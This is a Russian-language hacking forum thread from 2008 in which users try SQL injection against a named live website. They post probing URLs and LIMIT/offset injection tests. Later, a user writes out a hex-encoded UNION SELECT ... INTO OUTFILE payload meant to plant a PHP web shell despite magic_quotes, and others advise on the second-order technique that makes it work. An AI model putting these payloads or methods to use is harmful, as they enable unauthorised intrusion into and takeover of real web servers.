30.05.2008, 14:04
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
С нами:
9718355
Репутация:
310
|
|
Сообщение от AFoST
Чёт не разберусь никак с одной скулей...Может кто справится!?
Код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'
помойму там жосткий фильтр стоит.
ничего у меня не получается.
ты уверен чот она там есть??
на это тоже ругается:
PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d
|
|
|
30.05.2008, 14:16
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от brasco2k
помойму там жосткий фильтр стоит.
ничего у меня не получается.
ты уверен чот она там есть??
на это тоже ругается:
PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d
Как видишь, ошибка мускула есть  логично предположить, что это инъекция Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь...
возможно это инъекция после лимита, т.к.
Код:
http://micropig.com/microlink/category/58/start/3,1,1,2 -error
http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error
http://micropig.com/microlink/category/58/start/3,1/* -no error
|
|
|
|
30.05.2008, 14:18
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Я про этот случай:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123'
Нет там иньекта, он ругается каждый раз когда не может чтото найти, например:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 30.05.2008 в 14:21..
|
|
|
|
30.05.2008, 14:48
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
AFoST
Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос
Сдесь:
_http://micropig.com/microlink/?srch=2&start=30&searchtext=123
такой возможности нет
Сдесь:
_http://micropig.com/microlink/category/58/start/3
тройка это limit 3 т.е. можно повлиять так как ты описал:
_http://micropig.com/microlink/category/58/start/3,1/*
limit 3 offset 1(offset по умолчанию = 37)
Но ничего путного от этой инъекции (в mysql) не добиться
|
|
|
|
30.05.2008, 14:35
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?
|
|
|
|
30.05.2008, 14:51
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
0nep@t0p
Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
30.05.2008, 15:30
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
2 l-l00K
Запрос такой:
-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19/*
То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C6563 7420273C3F70687020706870696E666F28293B203F3E2C3220 66726F6D206D7973716C2E7573657220696E746F206F757466 696C6520272F686F6D652F736974652F7075626C69635F6874 6D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/*
Правильно ?
|
|
|
|
30.05.2008, 15:37
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
30.05.2008, 15:42
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
|
|
|
|
30.05.2008, 15:46
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
